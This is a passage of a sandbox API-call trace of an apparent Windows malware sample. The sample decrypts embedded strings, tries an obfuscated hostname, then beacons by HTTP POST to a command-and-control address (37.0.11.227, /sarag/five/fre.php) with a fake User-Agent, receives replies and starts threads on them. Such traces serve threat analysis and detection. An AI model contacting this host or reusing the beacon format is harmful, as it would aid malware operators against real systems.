pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0293.289] GetProcessHeap () returned 0x690000 [0293.289] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0293.290] GetProcessHeap () returned 0x690000 [0293.290] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0293.290] GetProcessHeap () returned 0x690000 [0293.290] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0293.290] GetProcessHeap () returned 0x690000 [0293.290] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0293.291] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0293.291] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0293.295] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0293.295] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeee0) returned 1 [0293.302] GetProcessHeap () returned 0x690000 [0293.302] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0293.303] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0293.303] CryptImportKey (in: hProv=0x6aeee0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0293.314] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0293.314] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0293.315] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0293.315] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0293.315] GetProcessHeap () returned 0x690000 [0293.315] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0293.316] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0293.316] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0293.317] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0293.317] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0293.318] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0293.318] CryptReleaseContext (hProv=0x6aeee0, dwFlags=0x0) returned 1 [0293.318] GetProcessHeap () returned 0x690000 [0293.318] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0293.319] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0293.319] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0293.319] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0293.320] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0293.320] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0293.321] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0293.321] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0293.322] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0293.322] GetProcessHeap () returned 0x690000 [0293.322] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0293.322] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0293.322] GetProcessHeap () returned 0x690000 [0293.322] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab380 [0293.322] socket (af=2, type=1, protocol=6) returned 0x970 [0293.322] connect (s=0x970, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0293.348] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0293.348] GetProcessHeap () returned 0x690000 [0293.348] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aeee0 [0293.348] GetProcessHeap () returned 0x690000 [0293.348] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0293.348] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0293.349] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0293.349] GetProcessHeap () returned 0x690000 [0293.349] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6aff80 [0293.349] GetProcessHeap () returned 0x690000 [0293.350] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0293.350] GetProcessHeap () returned 0x690000 [0293.350] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4418 [0293.350] GetProcessHeap () returned 0x690000 [0293.350] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0293.350] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0293.351] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0293.351] GetProcessHeap () returned 0x690000 [0293.351] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0293.351] GetProcessHeap () returned 0x690000 [0293.351] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0293.352] send (s=0x970, buf=0x6ad508*, len=242, flags=0) returned 242 [0293.352] send (s=0x970, buf=0x6aba40*, len=159, flags=0) returned 159 [0293.352] GetProcessHeap () returned 0x690000 [0293.352] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0293.352] recv (in: s=0x970, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0293.430] GetProcessHeap () returned 0x690000 [0293.430] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0293.431] GetProcessHeap () returned 0x690000 [0293.431] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0293.431] GetProcessHeap () returned 0x690000 [0293.431] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aff80 | out: hHeap=0x690000) returned 1 [0293.431] GetProcessHeap () returned 0x690000 [0293.431] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeee0 | out: hHeap=0x690000) returned 1 [0293.432] closesocket (s=0x970) returned 0 [0293.434] GetProcessHeap () returned 0x690000 [0293.434] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab380 | out: hHeap=0x690000) returned 1 [0293.434] GetProcessHeap () returned 0x690000 [0293.434] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0293.434] GetProcessHeap () returned 0x690000 [0293.435] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0293.435] GetProcessHeap () returned 0x690000 [0293.435] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0293.435] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x17e8) returned 0x970 [0293.440] Sleep (dwMilliseconds=0xea60) [0293.441] GetProcessHeap () returned 0x690000 [0293.441] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a3fe0 [0293.442] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0293.442] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0293.448] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0293.448] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeee0) returned 1 [0293.456] GetProcessHeap () returned 0x690000 [0293.456] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0293.457] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0293.457] CryptImportKey (in: hProv=0x6aeee0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0293.458] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0293.458] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0293.459] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0293.459] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0293.459] GetProcessHeap () returned 0x690000 [0293.460] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0293.469] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0293.469] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a3fe0, pdwDataLen=0x19fcfc | out: pbData=0x6a3fe0, pdwDataLen=0x19fcfc) returned 1 [0293.470] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0293.470] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0293.471] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0293.471] CryptReleaseContext (hProv=0x6aeee0, dwFlags=0x0) returned 1 [0293.471] GetProcessHeap () returned 0x690000 [0293.471] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0293.471] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0293.472] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0293.472] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0293.473] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0293.474] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0293.474] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0293.475] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0293.475] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0293.475] GetProcessHeap () returned 0x690000 [0293.475] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0293.475] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0293.477] GetProcessHeap () returned 0x690000 [0293.478] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0293.478] GetProcessHeap () returned 0x690000 [0293.478] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0293.478] GetProcessHeap () returned 0x690000 [0293.479] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0293.479] GetProcessHeap () returned 0x690000 [0293.479] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0293.479] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0293.480] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0293.485] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0293.486] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aee58) returned 1 [0293.493] GetProcessHeap () returned 0x690000 [0293.493] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0293.494] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0293.494] CryptImportKey (in: hProv=0x6aee58, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0293.495] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0293.495] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0293.496] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0293.496] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0293.496] GetProcessHeap () returned 0x690000 [0293.497] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0293.500] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0293.500] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0293.501] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0293.501] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0293.502] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0293.502] CryptReleaseContext (hProv=0x6aee58, dwFlags=0x0) returned 1 [0293.502] GetProcessHeap () returned 0x690000 [0293.502] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0293.503] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0293.504] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0293.504] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0293.505] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0293.506] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0293.506] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0293.507] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0293.507] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0293.507] GetProcessHeap () returned 0x690000 [0293.507] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0293.507] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0293.507] GetProcessHeap () returned 0x690000 [0293.507] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab370 [0293.507] socket (af=2, type=1, protocol=6) returned 0x974 [0293.508] connect (s=0x974, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0293.531] FreeAddrInfoW (pAddrInfo=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0293.531] GetProcessHeap () returned 0x690000 [0293.531] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aed48 [0293.531] GetProcessHeap () returned 0x690000 [0293.531] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0293.532] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0293.533] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0293.533] GetProcessHeap () returned 0x690000 [0293.533] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af440 [0293.533] GetProcessHeap () returned 0x690000 [0293.534] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0293.534] GetProcessHeap () returned 0x690000 [0293.534] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0293.534] GetProcessHeap () returned 0x690000 [0293.534] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0293.535] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0293.536] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0293.536] GetProcessHeap () returned 0x690000 [0293.536] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0293.536] GetProcessHeap () returned 0x690000 [0293.537] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0293.537] send (s=0x974, buf=0x6ad508*, len=242, flags=0) returned 242 [0293.538] send (s=0x974, buf=0x6aba40*, len=159, flags=0) returned 159 [0293.538] GetProcessHeap () returned 0x690000 [0293.538] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0293.538] recv (in: s=0x974, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0293.616] GetProcessHeap () returned 0x690000 [0293.616] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0293.616] GetProcessHeap () returned 0x690000 [0293.617] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0293.619] GetProcessHeap () returned 0x690000 [0293.619] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af440 | out: hHeap=0x690000) returned 1 [0293.620] GetProcessHeap () returned 0x690000 [0293.620] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aed48 | out: hHeap=0x690000) returned 1 [0293.620] closesocket (s=0x974) returned 0 [0293.621] GetProcessHeap () returned 0x690000 [0293.621] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab370 | out: hHeap=0x690000) returned 1 [0293.621] GetProcessHeap () returned 0x690000 [0293.621] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0293.621] GetProcessHeap () returned 0x690000 [0293.622] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0293.622] GetProcessHeap () returned 0x690000 [0293.622] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0293.622] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x17ec) returned 0x974 [0293.633] Sleep (dwMilliseconds=0xea60) [0293.652] GetProcessHeap () returned 0x690000 [0293.652] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0293.655] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0293.656] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0293.702] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0293.702] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0293.713] GetProcessHeap () returned 0x690000 [0293.713] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0293.717] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0293.718] CryptImportKey (in: hProv=0x6af078, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfe8) returned 1 [0293.719] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0293.719] CryptSetKeyParam (hKey=0x69cfe8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0293.720] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0293.720] CryptSetKeyParam (hKey=0x69cfe8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0293.720] GetProcessHeap () returned 0x690000 [0293.721] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0293.721] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0293.722] CryptDecrypt (in: hKey=0x69cfe8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0293.728] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0293.730] CryptDestroyKey (hKey=0x69cfe8) returned 1 [0293.731] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0293.731] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0293.732] GetProcessHeap () returned 0x690000 [0293.732] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0293.732] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0293.733] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0293.733] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0293.734] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0293.735] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0293.735] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0293.736] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0293.770] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0293.770] GetProcessHeap () returned 0x690000 [0293.770] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0293.770] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0293.771] GetProcessHeap () returned 0x690000 [0293.771] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0293.772] GetProcessHeap () returned 0x690000 [0293.772] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0293.772] GetProcessHeap () returned 0x690000 [0293.772] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0293.772] GetProcessHeap () returned 0x690000 [0293.772] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0293.773] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0293.773] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0293.778] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 